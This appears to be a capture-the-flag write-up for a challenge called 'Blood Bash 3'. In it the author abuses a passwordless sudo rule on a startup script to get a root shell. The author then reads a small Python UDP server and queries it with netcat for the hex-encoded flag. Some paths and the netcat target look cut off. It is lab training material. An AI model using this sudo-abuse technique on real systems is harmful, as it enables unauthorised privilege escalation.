Skip to content

Blood Bash 3


The challenge says that this flag is not in a normal file so I started looking around for programs or something similar. I found this:

bl0ody_mary@961430c4b52e:~$ cat /opt/ 

sudo /usr/sbin/srv &
exec /bin/bash

We can't read that srv program but I also saw this:

bl0ody_mary@961430c4b52e:~$ sudo -l 
Matching Defaults entries for bl0ody_mary on 961430c4b52e:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User bl0ody_mary may run the following commands on 961430c4b52e:
    (ALL) NOPASSWD: /opt/, /usr/sbin/srv

We are root!

Since we can use sudo to execute that start thing we can get a root shell simply by executing it:

bl0ody_mary@961430c4b52e:~$ sudo /opt/ 
root@961430c4b52e:/home/bl0ody_mary# Traceback (most recent call last):
  File "/usr/sbin/srv", line 14, in <module>
    udp_server_socket.bind((host, port))
OSError: [Errno 98] Address already in use


Looks like that srv program is trying to bind to a port, let's check the program now:

root@961430c4b52e:/home/bl0ody_mary# cat /usr/sbin/srv
#!/usr/bin/env python3

import socket as s
from binascii import hexlify as h, unhexlify as u

host = ""
port = 43526
buffer = 1024

msg = b"666c61677b6f70656e5f706f727428616c29737d"
bytes_to_send = u(msg)

udp_server_socket = s.socket(s.AF_INET, s.SOCK_DGRAM)
udp_server_socket.bind((host, port))

while True:
        bytes_address_pair = udp_server_socket.recvfrom(buffer)
        #message = bytes_address_pair[0]
        address = bytes_address_pair[1]

        udp_server_socket.sendto(bytes_to_send, address)
So it is hosting an interesting UDP service in the port 43526.

A flag!

Connecting to the service with netcat and pressing enter gives the flag:

root@961430c4b52e:/home/bl0ody_mary# nc -u 43526


Back to top